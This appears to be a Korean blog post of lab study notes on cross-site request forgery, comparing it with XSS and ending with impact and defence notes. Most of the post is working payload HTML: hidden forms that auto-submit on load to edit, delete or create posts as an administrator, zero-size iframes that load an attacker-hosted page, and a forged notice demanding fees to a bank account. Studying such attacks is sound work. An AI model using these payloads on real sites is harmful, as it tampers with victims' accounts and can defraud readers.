2014. 11. 4. 14:47
336x280(권장), 300x250(권장), 250x250, 200x200 크기의 광고 코드만 넣을 수 있습니다.

CSRF 


공격자가 작성해 놓은 request를 통해 일어나는 악위적인 공격

자신의 의도와는 다른 액션이 발생




차이 


xss : 악성 스크립트가 사용자 클라이언트에서 일어남

csrf : 인증 완료된 자신의 권한으로 서버에 요청



---------


.75 -> 웹서버

.140 -> 공격자 IP




<form name="csrf" action="board_update_reg.asp" method="POST">


<input type="text" name="user" value="admin">

<input type="text" name="title" value="test">

<input type="text" name="contents" value="test">

<input type="text" name="idx" value="">

<input type="submit" value="">

</form>



------------

<body onload="document.csrf.submit();">   
<form name="csrf" action="board_update_reg.asp" method="POST">

<input type="hidden" name="user" value="admin">
<input type="hidden" name="title" value="공지사항">
<input type="hidden" name="contents" value="공지사항입니다

모임회비 : 5만원
국민 123-123-123 ">
<input type="hidden" name="idx" value="3">

</form>

-> 임의로 관리자 권한으로 3번 글 수정

---------------------

<body onload="document.csrf.submit();">    
<form name="csrf" action="board_delete.asp" method="GET">
<input type="hidden" name="num" value="5">
</form>


-> 임의로 관리자의 권한으로 글 삭제 


---------



<body onload="document.csrf.submit();">    

<form name="csrf" action="board_write_reg.asp" method="POST" ENCTYPE="multipart/form-data">

<input type="hidden" name="title" value="">

<input type="hidden" name="content" value="">

</form>


-> 임의로 글 작성 



-> 소스에서 쓰는 name값을 써주어야함 (ex. name="content  ||    name="contents" )



------------------





<iframe src="http://192.168.0.140/1.html" width=0 height=0></iframe>



--------


1.html  소스 



<body onload="document.csrf.submit();">    

<form name="csrf" action="http://192.168.0.140/board_write_reg.asp" method="POST" ENCTYPE="multipart/form-data">

<input type="hidden" name="title" value="공지이이이이">

<input type="hidden" name="content" value="공지사항이니 주의깊게 읽으시길">

</form>




----------


<body onload="document.csrf.submit();">

<form name="csrf" action="http://192.168.0.75/board/board_update_reg.asp" method="POST">

<input type="hidden" name="user" value="admin">

<input type="hidden" name="title" value="공지이이이이">

<input type="hidden" name="content" value="공지사항이니 주의깊게 읽으시길">

<input type="hidden" name="idx" value="12">

</form>



-><iframe> 태그로  임의로 글 수정 




-----------------



<iframe src="http://192.168.0.75/board/board_delete.asp?num=12" width=0 height=0></iframe>



-> 임의로 게시글 지우기 

-> URL 창에서 http://192.168.0.75/board/board_delete.asp?num=12 입력해도 가능 


-> 서버의 각기 다른 파라미터 값을 파악하는 것이 주요 



del = delete 

update = modify = edit

...

...




-------------------------


1. what 

: 공격자가 작성해 놓은 악의적인 글을 통해서 희생자의 의도와는 다른 행위가 일어나는 공격 


2. why

html 사용에 의해 일어남

xss와 근본적으로 원인이 같음


victim : 사용자, 관리자


3. attack test 

우선 xss 공격이 일어나는 것을 확인 후 

소스 보기를 활용해서 공격 (오픈 소스일 경우 공격 성공 확률이 높음)



4. impact 

타인의 글을 수정, 삭제, 생성 가능 

(타인의 의도와 상관없이 발생)


5. security

xss와 같음

html encoding(화이트리스트 방식 적용)








'Web' 카테고리의 다른 글

webshell and defense of it  (0) 2014.11.06
CSRF  (0) 2014.11.05
advanced web  (0) 2014.10.30
tools and searching vulnerabilities  (0) 2014.10.29
googling  (0) 2014.10.28
Posted by af334